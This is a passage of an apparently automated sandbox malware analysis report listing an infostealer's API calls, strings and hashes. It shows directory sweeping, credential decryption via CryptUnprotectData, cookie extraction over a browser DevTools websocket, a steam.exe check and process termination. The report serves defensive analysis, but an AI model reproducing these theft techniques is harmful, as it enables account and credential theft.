                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: d9cf08d50326fbaf436c9e3e954f1dff9064e669c93b9d39b14ec42a27c9a31d
                            • Instruction ID: 145c34c8c64386f390d0d38a9cac1ab2ed00e92b14fd758fc43877083cf430f7
                            • Opcode Fuzzy Hash: d9cf08d50326fbaf436c9e3e954f1dff9064e669c93b9d39b14ec42a27c9a31d
                            • Instruction Fuzzy Hash: 4381853591119AABCF21EF69DC89EAE7BB8FF46700F444124F805E7256CB709D41CB92
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008FDF35
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008FDF3C
                            • wsprintfA.USER32 ref: 008FDF52
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FDF69
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FDF8C
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FDFA6
                            • wsprintfA.USER32 ref: 008FDFC4
                            • DeleteFileA.KERNEL32(?), ref: 008FE010
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FDFDD
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                              • Part of subcall function 008FDB70: memset.MSVCRT ref: 008FDB91
                              • Part of subcall function 008FDB70: memset.MSVCRT ref: 008FDBA3
                              • Part of subcall function 008FDB70: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FDBCB
                              • Part of subcall function 008FDB70: lstrcpy.KERNEL32(00000000,?), ref: 008FDBFE
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,00000000), ref: 008FDC0C
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,012FF768), ref: 008FDC26
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,?), ref: 008FDC3A
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,012FDFB0), ref: 008FDC4E
                              • Part of subcall function 008FDB70: lstrcpy.KERNEL32(00000000,?), ref: 008FDC7E
                              • Part of subcall function 008FDB70: GetFileAttributesA.KERNEL32(00000000), ref: 008FDC85
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FE01E
                            • FindClose.KERNEL32(00000000), ref: 008FE02D
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FE056
                            • lstrcat.KERNEL32(?,012FE140), ref: 008FE06A
                            • lstrlen.KERNEL32(?), ref: 008FE074
                            • lstrlen.KERNEL32(?), ref: 008FE082
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE0C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 4a985e8e96d6f89bf48505dc3ad1cfac6576f8045ae2a8394e7b72553f031076
                            • Instruction ID: ee27226b0fa9f4c4b0074939a3de7193a00ddfe0001421cd10496ff8b6f2a3f8
                            • Opcode Fuzzy Hash: 4a985e8e96d6f89bf48505dc3ad1cfac6576f8045ae2a8394e7b72553f031076
                            • Instruction Fuzzy Hash: A6616172910258ABCB20EF78DC89EEE77B9FF88300F4085A8B605D7251DF74AA55CB51
                            APIs
                            • wsprintfA.USER32 ref: 008FD73D
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FD754
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FD774
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FD78E
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FD7D3
                            • lstrcat.KERNEL32(?,012FFBC8), ref: 008FD7E7
                            • lstrcat.KERNEL32(?,?), ref: 008FD7FB
                            • lstrcat.KERNEL32(?,?), ref: 008FD80C
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FD81E
                            • lstrcat.KERNEL32(?,?), ref: 008FD832
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD872
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD8C2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FD927
                            • FindClose.KERNEL32(00000000), ref: 008FD936
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 44ec706f1b5088e15b6ff7b94a86400fde2d8c84b395a3ecc0b424798f38cf38
                            • Instruction ID: bb14d665a68afc63398bc36dce3ec4ff83beed5f266d540e9d4a1b030df48d8b
                            • Opcode Fuzzy Hash: 44ec706f1b5088e15b6ff7b94a86400fde2d8c84b395a3ecc0b424798f38cf38
                            • Instruction Fuzzy Hash: 3B615471910259ABCB10EF74DC88AEE77B9FF48300F4088A5E649E7251DB74AA45CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 574e6ddcf2df3f133979d606309f0f76610f042ae3881eef28c0cd30069b2b10
                            • Instruction ID: 3c69e79d40812991d132713c0532410c3198260d15782d2b3b236bfab6a798a0
                            • Opcode Fuzzy Hash: 574e6ddcf2df3f133979d606309f0f76610f042ae3881eef28c0cd30069b2b10
                            • Instruction Fuzzy Hash: 5CA25871E012699FDB20DFA8C8807EEBBB6FF48300F5585A9D509A7281DB705E85CF91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F2524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F2552
                            • lstrlen.KERNEL32(\*.*), ref: 008F255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F2586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F25BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F25D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: de414b5d723e3c2c6b3c2fc8cb99b895dcab15daa278935768f4d5c9f0d1b265
                            • Instruction ID: de180399e9ff7f049b6043a58813d5acdd636b3ce6ee3b744ba796d1b34246b8
                            • Opcode Fuzzy Hash: de414b5d723e3c2c6b3c2fc8cb99b895dcab15daa278935768f4d5c9f0d1b265
                            • Instruction Fuzzy Hash: C2419E326102AA9BCB22EF3DDC89EAE77A8FF15300F004134B909D7252DB709D458B92
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009048C9
                            • Process32First.KERNEL32(00000000,00000128), ref: 009048D9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009048EB
                            • StrCmpCA.SHLWAPI(?,?), ref: 009048FD
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904912
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00904921
                            • CloseHandle.KERNEL32(00000000), ref: 00904928
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00904936
                            • CloseHandle.KERNEL32(00000000), ref: 00904941
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                            • Instruction ID: 49111658b3d7f46f99396e9fef2dcc10b8c00e2a152394a25678f07c79fecbc9
                            • Opcode Fuzzy Hash: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                            • Instruction Fuzzy Hash: 90016D71601214AFE7215B60EC8DFFB377CEB48B11F404198FA09D2180EF749A858AA5
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00904838
                            • Process32First.KERNEL32(00000000,00000128), ref: 00904848
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090485A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00904870
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00904882
                            • CloseHandle.KERNEL32(00000000), ref: 0090488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4CDF
                            • lstrlen.KERNEL32(00914CAC), ref: 008F4CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D07
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F4D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F4D5A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00902F6B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00902F7D
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00902F8A
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00902FBC
                            • LocalFree.KERNEL32(00000000), ref: 0090319A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 8Nt$:g.$>]W$Ja/'$^"3}$f]o7
                            • API String ID: 0-1730553010
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: $[{$58{$58{$C'||$Wl|$qgg
                            • API String ID: 0-3238819347
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902E12
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902E19
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00902E28
                            • wsprintfA.USER32 ref: 00902E53
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: =6o;$Q vw$Q vw$SLG$b"%{
                            • API String ID: 0-3960046968
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 4Yw$5isc$cK%_$ekGt$(`=
                            • API String ID: 0-3750377496
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E7765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E77AD
                            • LocalFree.KERNEL32(?), ref: 008E77B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: /8{]$=Pe$^W$d<?
                            • API String ID: 0-688036109
                            • Opcode ID: 176b3ab2bfb5e15dfd9225ac863a17f0d2ff0e8461fc86b7c9a1faf67a8e56f1
                            • Instruction ID: 0383eeac09fe8dcd17cc2b46dd466083cb912bd91f47e107e548e419f3a461fc
                            • Opcode Fuzzy Hash: 176b3ab2bfb5e15dfd9225ac863a17f0d2ff0e8461fc86b7c9a1faf67a8e56f1
                            • Instruction Fuzzy Hash: C4B218F360C2049FE308AE2DEC8567ABBE6EFD4320F1A493DE6C5C3744EA3558058656
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $r</$5;ow$IQ>7$bOGk
                            • API String ID: 0-1528566901
                            • Opcode ID: f658ff58334509b2366e7e71ea3bc587effd230e72ea2e4e5c46925e3edb31df
                            • Instruction ID: fb606d0b60c7006dda803fb0fd72990c9bbb4af2f3af438e86a213dd38ce6d49
                            • Opcode Fuzzy Hash: f658ff58334509b2366e7e71ea3bc587effd230e72ea2e4e5c46925e3edb31df
                            • Instruction Fuzzy Hash: 5FB23BF3A0C204AFE3046E2DEC8567ABBD5EB94760F164A3DE6C4C7744EA3558018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
